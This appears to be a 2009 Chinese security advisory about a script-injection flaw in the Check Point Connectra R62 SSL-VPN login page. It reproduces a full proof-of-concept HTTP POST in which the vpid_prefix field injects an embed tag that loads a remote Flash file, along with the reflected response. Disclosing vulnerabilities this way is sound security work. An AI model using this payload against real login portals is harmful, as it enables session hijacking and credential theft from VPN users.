安全研究

安全漏洞
CheckPoint Connectra /Login/Login任意脚本注入漏洞

发布日期:2009-09-21
更新日期:2009-09-22

受影响系统:
Check Point Software Connectra R62
描述:
BUGTRAQ  ID: 36466

CheckPoint Connectra是一个SSL-VPN解决方案,允许用户使用普通的web浏览器访问远程系统。

Connectra的/Login/Login目录下的初始登录脚本没有对用户通过HTTP POST请求所提交的输入数据执行正确的验证,远程攻击者可以通过在请求中包含特制vpid_prefix参数导致注入并执行任意脚本。

<*来源:Stefan Friedli
  
  链接:http://marc.info/?l=bugtraq&m=125354733916834&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

--- CUT ---
POST https://www.example.com:443/Login/Login HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2)
Gecko/20090729 Firefox/3.5.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://www.example.com/Login/Login?LangCode=
Cookie: CheckCookieSupport=1; ICSCookie=***purged***; user_locale=en_US
Content-Type: application/x-www-form-urlencoded
Content-length: 153

loginType=Standard&amp;userName=&amp;vpid_prefix=&quot;&gt;&lt;embed/src=&quot;http://www.example2.com/p/s/w/ccs.swf&quot;
allowScriptAccess=always&gt;&lt;a name=&quot;
&amp;password=&amp;HeightData=1147&amp;Login=Sign+In

--- CUT END ---

Response Snippet:

--- CUT ---
&lt;input type=&quot;hidden&quot; id=&quot;vpid_prefix&quot; name=&quot;vpid_prefix&quot;
value=&quot;&quot;&gt;&lt;embed/src=&quot;http://www.example2.com/p/s/w/ccs.swf&quot;
allowScriptAccess=always&gt;&lt;a name=&quot;&quot;&gt;
--- CUT END ---

建议:
厂商补丁:

Check Point Software
--------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.checkpoint.com

浏览次数:2601
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障